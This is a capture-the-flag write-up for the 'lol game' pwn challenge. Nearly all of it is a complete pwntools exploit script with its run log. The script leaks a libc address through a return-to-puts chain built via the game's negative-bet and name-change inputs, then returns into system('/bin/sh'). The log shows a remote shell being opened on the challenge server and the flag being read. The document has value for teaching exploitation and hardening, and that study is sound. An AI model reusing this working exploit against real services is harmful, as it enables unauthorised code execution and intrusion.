Rating:

# **=== lol game (Pwn: 14 solves / 831 pt) ===**

```
from pwn import *
import sys

#context(os='linux', arch='i386')
#context.log_level = 'debug'

BINARY = './LOLgame'
elf = ELF(BINARY)

# No libc was shipped with the challenge; the leaked puts() address was
# matched against https://libc.blukat.me/ which gave
# "libc6-i386_2.24-9ubuntu2_amd64".  (The hard-coded offsets further down
# are annotated 2.24-9ubuntu2.2 -- confirm which of the two labels is the
# build that actually matched.)

# Binary-local addresses.  The target has no PIE (see the checksec output
# in the transcript), so these are the same on every run.
puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
main_addr = 0x8048430  # main(); presumably read from the disassembly

# "r" as the first argument selects the remote service, anything else a
# local process.  NOTE: the flag is also called `remote`, which shadows
# the pwntools remote() factory brought in by `from pwn import *`; the
# script never calls remote() again, so it is harmless here, but rename
# it before extending the script.
if sys.argv[1:2] == ['r']:
    s = remote("lolgame.acebear.site", 3004)
    remote = 1
else:
    s = process(BINARY)
    libc = elf.libc  # only a local run has a libc object to resolve symbols from
    remote = 0

def Play(point):
    """Drive one round of menu option 1 with a negative bet of ``point``.

    Sends choice "1", then ``-<point>`` at the bet prompt, then the
    row/column pairs (1,1), (2,2), (3,3).  Every call site passes an
    address as ``point`` (PLT/GOT entry, main, system, "/bin/sh"), so
    the negated bet is presumably what lets the value land outside the
    game's intended buffer -- i.e. the bet input looks like it lacks a
    lower-bound check; confirm against the binary.  This function only
    performs the protocol exchange.  Uses the module-level connection
    ``s``.
    """
    bet = "-%s" % point
    s.recvuntil("Your Choice:\n")
    s.sendline("1")
    s.recvuntil("Enter Your Bet Point: ")
    s.sendline(bet)
    # Three moves down the diagonal: the same index is sent as row and column.
    for cell in (1, 2, 3):
        move = str(cell)
        s.recvuntil("Enter row: ")
        s.sendline(move)
        s.recvuntil("Enter column: ")
        s.sendline(move)

def Change(name):
    """Menu option 3: set the player's name to ``name``.

    In this script ``name`` is always 16 filler bytes plus one trailing
    byte (0x39, 0x3a, 0x3b at the call sites).  The consecutive values
    look like they select consecutive 4-byte slots that the following
    Play() call writes into -- inferred from the call order, confirm in
    the binary.  Uses the module-level connection ``s``.
    """
    exchange = (
        ("Your Choice:\n", "3"),
        ("Enter your name: \n", name),
    )
    for prompt, reply in exchange:
        s.recvuntil(prompt)
        s.sendline(reply)

def Exit():
    """Menu option 4: quit the game.  Uses the module-level connection ``s``."""
    prompt, reply = "Your Choice:\n", "4"
    s.recvuntil(prompt)
    s.sendline(reply)

# Hardening note, from the checksec output in the transcript (no canary,
# No RELRO, no PIE): every fixed address used below exists only because
# the binary is not position independent, and the overwritten return
# path runs because there is no stack protector.  Either mitigation, or
# Full RELRO for the GOT read, would have forced a different approach.


def _poke(tag, value):
    """Rename to ``tag``, then run one Play() with ``value`` as the bet."""
    Change(tag)
    Play(value)


# --- stage 1: leak the libc address of puts() ------------------------------
s.recvuntil("Enter your name: \n")
s.sendline("1")

_poke("A" * 16 + "\x39", puts_plt_addr)  # slot 0: return address -> puts@plt
_poke("A" * 16 + "\x3a", main_addr)      # slot 1: puts() returns into main()
_poke("A" * 16 + "\x3b", puts_got_addr)  # slot 2: puts() argument -> puts@got

Exit()

s.recv(4)  # presumably the "Bye!" the game prints on exit; not part of the leak
leak = s.recv(0x18)
puts_addr = u32(leak[:4])

if not remote:
    # Local run: resolve everything from the libc pwntools found for the binary.
    libc_base_addr = puts_addr - libc.symbols['puts']
    system_addr = libc_base_addr + libc.symbols['system']
    binsh_addr = libc_base_addr + next(libc.search('/bin/sh'))
else:
    # Remote run: hard-coded offsets for libc6-i386_2.24-9ubuntu2.2_amd64
    # (the header comment names 9ubuntu2 -- one of the two labels is off).
    libc_base_addr = puts_addr - 0x05f940
    system_addr = libc_base_addr + 0x03a900
    binsh_addr = libc_base_addr + 0x15d00f

for label, value in (
    ("puts_addr", puts_addr),
    ("libc_base_addr", libc_base_addr),
    ("system_addr", system_addr),
    ("binsh_addr", binsh_addr),
):
    print("%s = %s" % (label, hex(value)))

# --- stage 2: the game restarted in main(); same layout, only slots 0 and 2
# are written this time: return into system() with "/bin/sh" as its argument.
s.recvuntil("Enter your name: \n")
s.sendline("1")

_poke("A" * 16 + "\x39", system_addr)
_poke("C" * 16 + "\x3b", binsh_addr)

Exit()

s.interactive()
```

```
root@kali: # python exploit.py r
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Opening connection to lolgame.acebear.site on port 3004: Done
puts_addr = 0xf7e22940
libc_base_addr = 0xf7dc3000
system_addr = 0xf7dfd900
binsh_addr = 0xf7f2000f
[*] Switching to interactive mode
Bye!$ id
uid=1000(lolgame) gid=1000(lolgame) groups=1000(lolgame)
$ cd /home/lolgame
$ cat flag
AceBear{tH4_r00t_1s_pr0gr4m_l3u7_u_are_hum4n}
```